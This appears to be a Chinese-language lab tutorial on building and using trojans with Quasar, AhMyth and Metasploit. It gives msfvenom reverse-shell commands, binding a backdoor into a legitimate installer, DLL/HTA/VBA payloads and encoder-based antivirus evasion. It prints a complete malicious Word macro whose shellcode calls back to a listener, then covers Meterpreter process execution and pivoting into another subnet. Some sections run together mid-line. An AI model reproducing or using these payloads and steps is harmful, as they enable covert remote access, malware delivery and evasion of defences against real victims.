Metasploit使用
Metasploit使用
*本工具仅供技术分享、交流讨论,严禁用于非法用途。
Quasar使用
Quasar是一个简易的木马管理工具
https://github.com/quasar/Quasar/releases/tag/v1.4.0
这里可以先下载,之后运行Quasar.exe启动服务端
之后点击builder开始生成木马,这里我们的win2003机器是 192.168.0.105
这里要在setting中设置一个start listening
这里要关闭win10的防火墙,就可以看到上线了
Android木马配置
https://github.com/AhMyth/AhMyth-Android-RAT/releases
这里是一个android apk木马,可以自动生成使用方法类似,就不过多赘述了
MSF木马配置
x86-windows的后门
生成后门:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows
-f exe -o ./viru.exe LHOST=ip LPORT=4444
#这条指令就可以生成一个exe的木马后门
打开msf的监听器:
```shell
msfconsole -q #这里是快速启动msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
#这里其实有很多payload这里我们先记住这一个
set LHOST ip #监听哪个主机的反弹shell就输入什么IP
set LPORT port
run/exploit
#开始监听
MSF木马VBS配置
Windows-vbs脚本木马生成msfvenom -l formats #就是查看我们可以生成的文件格式列表
vbs其实是直接修改我们生成的文件格式就可以,但是每次都要输入命令就非常的麻烦,于是我们可以写一段脚本来代替我们执行ip=192.168.119.123 port=4444 arch=x86 platform=windows format=exe payload=windows/meterpreter/reverse_tcp out=../Backs/meter_re_tcp_x86.exe msfvenom -p $payload LHOST=$ip LPORT=$port -a $arch -f $format --platform $platform -o $out
我们给这个脚本名称成windows_x86.sh每次需要生成一个exe二进制木马的时候就修改IP地址直接运行脚本是最好的
msfconsole每次打开监听器的时候也非常的麻烦,我们也可以写入一个文件,然后执行msfconsole -r 文件名
木马捆绑
#其实首先我们需要有一个可以捆绑的可执行文件
ip=192.168.119.123
port=4444
arch=x86
platform=windows
format=exe
payload=windows/meterpreter/reverse_tcp
x=/home/kali/Desktop/hfs.exe #这里就是我们要捆绑到一起的软件
out=../Backs/meter_re_tcp_x86.exe
msfvenom -p $payload LHOST=$ip LPORT=$port -a $arch -f $format -x $x --platform $platform -o $out
MSF木马dll
首先还是将-f参数修改成dll文件,这样就能生成一个dll文件的木马
rundll32 dll.location DllEntryPoint #这里就是执行dll的命令,rundll32是每一个电脑上一定会自带的指令
MSF劫持DLL
dll其实就是一个exe文件中的方法,程序员并不想把所有的函数和功能都写到一起去,于是就可以写一个dll文件让exe如果执行一个功能的时候去动态调用一个链接库就使用其中的功能。
这之中的内容还是比较复杂的,之后有时间的时候再继续深入研究
MSF木马HTA配置
这里也是使用HTA可以过一些杀软,format:hta-psh 就是把format给修改了生成的木马格式就好,这里还是用powershell来执行来获得反弹shell的
MSF木马混淆(encoder)
msfvenom -e encoder -i 3 #-i参数就是迭代几次,这里是3次,然后用encoder混淆,相当于是免杀但是基本没用
msfvenom -k #-k参数就是说让捆绑的木马依然执行之前的操作,但是同时开一个线程来执行我们的后门程序
Meterpreter
文件操作value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format value>] ============================================== Name ---- base32 base64 bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript #然后这里的raw格式就是生成源代码,而不是shellcode,如果直接选择py/python的生成的就是shellcode msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o /home/kali/Desktop/back.py #这里生成的-f 是raw格式的
msf6 payload(python/meterpreter/reverse_tcp) > generate -f py -o /home/kali/Desktop/back.py
[*] Writing 3196 bytes to /home/kali/Desktop/back.py...
#这里我们用python格式生成的时候就是shellcode
所以要生成对方能直接执行的是代码就是用raw格式的
MSF辅助模块
MSF中有很多这种辅助的扫描模块
msf6 > use auxiliary/gather/browser_info #这个是查询浏览器信息的模块
msf6 auxiliary(gather/browser_info) > show options
Module options (auxiliary/gather/browser_info):
Name Current Setting Required Description
---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes #这里应该就是说我们的kali主机的IP
This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes #开启的端口
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer A web server that collects information about the browser.
#然后设置我们的IP地址
msf6 auxiliary(gather/browser_info) > set srvhost 192.168.65.4
srvhost => 192.168.65.4
msf6 auxiliary(gather/browser_info) > set srvport 80
srvport => 81
msf6 auxiliary(gather/browser_info) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(gather/browser_info) >
[*] Using URL: http://192.168.65.4:81/VgdDwPqbj
[*] Server started.
然后让我们用chrome来访问一下这个链接
我们在kali中就能见到chorme的信息
MSF混淆模块
msf6>show encoders
#这里msfvenom使用-e参数,就可以加密这里我们用PHP的举例
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -l encoders
Framework Encoders [--encoder value>]
======================================
Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encod
er
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder
#这里我们用PHP的payload来测试一下
show payloads
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f raw -o /home/kali/Desktop/back.php
#这里就是生成了一个back.php的文件,我们来查看一下
这里并没有加密就是简单的PHP的payload代码,现在用encoder混淆一下
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f raw -o /home/kali/Desktop/back.php -e php/base64
#这里用php/base64混淆生成的代码就是加密后的代码
evasion模块能过防火墙
#MSF还有一个模块就是evasion模块好像是可以做免杀
MSF-POST模块
msf6>show post
#post模块是一个后渗透的模块,就是我们有一个sessions之后,对主机进行的操作,不只能搜集主机信息,还能执行一些东西
MSF插件
#MSF的插件就是辅助我们的一种工具,这里能看到MSF中默认有的插件
msf6 > load -l
[*] Available Framework plugins:
* sounds
* wmap
* ips_filter
* beholder
* rssfeed
* libnotify
* session_notifier
* event_tester
* auto_add_route
* sample
* sqlmap
* socket_logger
* thread
* nessus
* nexpose
* ffautoregen
* request
* db_tracker
* session_tagger
* token_adduser
* wiki
* msgrpc
* openvas
* alias
* msfd
* db_credcollect
* token_hunter
* pcap_log
* aggregator
* besecure
* lab
#使用sqlmap插件就是load sqlmap
msf6 > load sqlmap
[*] Sqlmap plugin loaded
[*] Successfully loaded plugin: Sqlmap
MSF数据库
systemctl start postgresql
sudo msfdb init
db_status #查看数据库的连接状态
hosts #查看打过哪些主机
services #查看开启的服务
notes #详细信息
loot #渗透到别人的网站执行过什么东西
介绍一个MSF提供的一个workspace的功能,我们可以建立一个workspace
workspace -a xxx #新建一个xxx的工作台,可以区分我们的工作任务
workspace -v #查看工作台的信息
msf6 exploit(windows/smb/ms17_010_eternalblue) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
default 1 0 1 0 0 1
* Red256 0 0 0 0 0 0
workspace xxx #使用xxx工作台
db_disconnent #断开连接
db_connect #连接数据库
msf6 > db_connect msf:JaT0FUrIngVkSyeFPtsvgAnCyTyDBzcO6H6RHqtDcCI=@localhost:5432/msf
[*] Connected to Postgres data service: localhost/msf
db_save #将我们的数据存储到数据库中
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_save
Successfully saved data service as default: local_db_service
重新连接数据库的时候db_connect指令的时候在/usr/share/metasploit-framework/config/database.yml里有postgresql的配置文件
MSF宏攻击
这里用msfvenom生成的内容就是vba/vba-exe的格式,但是经过测试还是vba内容的比较稳定
首先要使宏攻击产生作用就要先开启word的宏
文件 -->选项-->信任中心-->信任中心设置-->宏设置-->开启所有宏
然后就是打开开发工具
之后就可以在任务栏看到开发工具了,然后创建一个宏
可以看到如下界面
之后就是生成恶意代码,恶意代码就需要去MSF中生成
#首先在msfvenmon中生成一下恶意宏
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f vba -o /home/kali/Desktop/back.vba
#MSF中也有一个模块能直接生成宏文件
search macro
use exploit/multi/fileformat/office_word_macro #是可以直接生成一个宏文件的
这里就是生成的back.vba的内容
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Afab As Long, ByVal Qssg As Long, ByVal Pcmeos As LongPtr, Azeqtcz As Long, ByVal Ezpcxnw As Long, Bwknwv As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Mmdpsaam As Long, ByVal Rcgqsabm As Long, ByVal Ipsylb As Long, ByVal Msku As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Pkr As LongPtr, ByRef Hokvmpbxl As Any, ByVal Bck As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Afab As Long, ByVal Qssg As Long, ByVal Pcmeos As Long, Azeqtcz As Long, ByVal Ezpcxnw As Long, Bwknwv As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Mmdpsaam As Long, ByVal Rcgqsabm As Long, ByVal Ipsylb As Long, ByVal Msku As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Pkr As Long, ByRef Hokvmpbxl As Any, ByVal Bck As Long) As Long
#End If
Sub Auto_Open()
Dim Wmofp As Long, Ugfnt As Variant, Grpdzgctz As Long
#If VBA7 Then
Dim Vkybp As LongPtr, Koxt As LongPtr
#Else
Dim Vkybp As Long, Koxt As Long
#End If
Ugfnt = Array(232, 143, 0, 0, 0, 96, 49, 210, 137, 229, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 49, 255, 15, 183, 74, 38, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 139, 72, 24, 1, 211, 133, 201, 116, 60, 73, 139, _
52, 139, 49, 255, 1, 214, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 51, 50, 0, 0, 104, 119, 115, 50, 95, 84, _
104, 76, 119, 38, 7, 137, 232, 255, 208, 184, 144, 1, 0, 0, 41, 196, 84, 80, 104, 41, 128, 107, 0, 255, 213, 106, 10, 104, 192, 168, 65, 4, 104, 2, 0, 17, 92, 137, 230, 80, 80, 80, 80, 64, 80, 64, 80, 104, 234, 15, 223, 224, 255, 213, 151, 106, 16, 86, 87, 104, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 255, 78, 8, 117, 236, 232, 103, 0, 0, 0, _
106, 0, 106, 4, 86, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 54, 139, 54, 106, 64, 104, 0, 16, 0, 0, 86, 106, 0, 104, 88, 164, 83, 229, 255, 213, 147, 83, 106, 0, 86, 83, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 104, 0, 64, 0, 0, 106, 0, 80, 104, 11, 47, 15, 48, 255, 213, 87, 104, 117, 110, 77, 97, 255, 213, _
94, 94, 255, 12, 36, 15, 133, 112, 255, 255, 255, 233, 155, 255, 255, 255, 1, 195, 41, 198, 117, 193, 195, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)
Vkybp = VirtualAlloc(0, UBound(Ugfnt), opt> The arguments to pass to the command.#运行指令的参数
-c Channelized I/O (required for interaction).
-d opt> The 'dummy' executable to launch when using -m.#使用-m的时候指定迁移的进程
-f opt> The executable command to run.#执行的命令
-h Help menu.
-i Interact with the process after creating it.#交互式的运行,一般cmd用来
-k Execute process on the meterpreters current desktop
-m Execute from memory.#迁移进程
-s opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
我们执行一个notepad指令
meterpreter > execute -f notepad
Process 5248 created.
meterpreter > execute -f notepad -a test.txt
#这里桌面有一个test.txt打开的就是这个test文件
Process 5340 created.
#如果没有这个文件的话就会弹窗提示要不要创建这个文件
#运行一个cmd
meterpreter > execute -f cmd -i
Process 6056 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\Red256\Desktop>dir
dir
������ C �еľ�û�б�ǩ��
��������� FEAF-EA72
C:\Users\Red256\Desktop ��Ŀ¼
2021/07/05 21:45 DIR> .
2021/07/05 21:45 DIR> ..
2021/06/24 17:20 DIR> 32λvc9��11��14���п�
2021/07/05 21:24 73,802 back.exe
2021/06/24 17:09 DIR> MantraPortable
2021/07/04 22:01 585 msf.rtf
2021/07/02 23:24 DIR> Office2010��װ
2021/06/24 22:07 881 phpStudy.lnk
2021/07/02 23:44 12,862 shell.docx
2021/07/05 21:45 5 test.txt
2021/02/19 15:06 DIR> win10jh
2021/06/29 18:11 DIR> �㽭������
创建傀儡进程
-f参数跟一个本地的程序,然后-m -d notepad
meterpreter > execute -f /home/kali/Desktop/cmd.exe -m -d notepad
Process 3424 created.
#这里理论上会执行一个notepad窗口的cmd但是我翻车了
MSF-Pivot
Pivot模块其实就是跳板机,这里我是macos的环境,虚拟环境配置起来会非常的麻烦,简单地说就是域内有一个台主机有两张网卡,分别连不同的网段,我们kali现在只能打到一个网段,但是现在发现还有一个其他的网段,这时候就起作用了
这里先开始配置一下我们自己的虚拟机
1.桥接模式的主机负责虚拟机跟外网连接
2.NAT负责虚拟机之间的互相通信,虚拟机和宿主机联通
这里我给我的windows电脑开了两台机器,一台的IP是10.10.168.2 一台有两张网卡是10.10.168.3/192.168.0.110
msf6 exploit(multi/handler) > set lhost 192.168.0.111
lhost => 192.168.0.111
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.111:4444
[*] Sending stage (175174 bytes) to 192.168.0.110
[*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.110:1273) at 2021-07-08 10:30:27 -0400
#这里先上线192.168.0.110,然后我们假如说想扫描10网段的主机,这里肯定是扫描不到的
meterpreter > run post/multi/manage/autoroute
#这个模块是自动填充路由的作用
[!] SESSION may not be compatible with this module (incompatible session platform: windows)
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.168.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
#现在就是可以使用portscan的模块去扫到10网段的主机了
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 10.10.168.2: - 10.10.168.2:21 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:139 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:135 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:445 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:777 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:1025 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:1029 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:1030 - TCP OPEN
[+] 10.10.168.2: - 10.10.168.2:1028 - TCP OPEN
#这里可以明显看到我们可以访问到10网段的主机了吧,kali是192网段的
post/multi/manage/autoroute 该模块是可以操作的
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options
Module options (post/multi/manage/autoroute):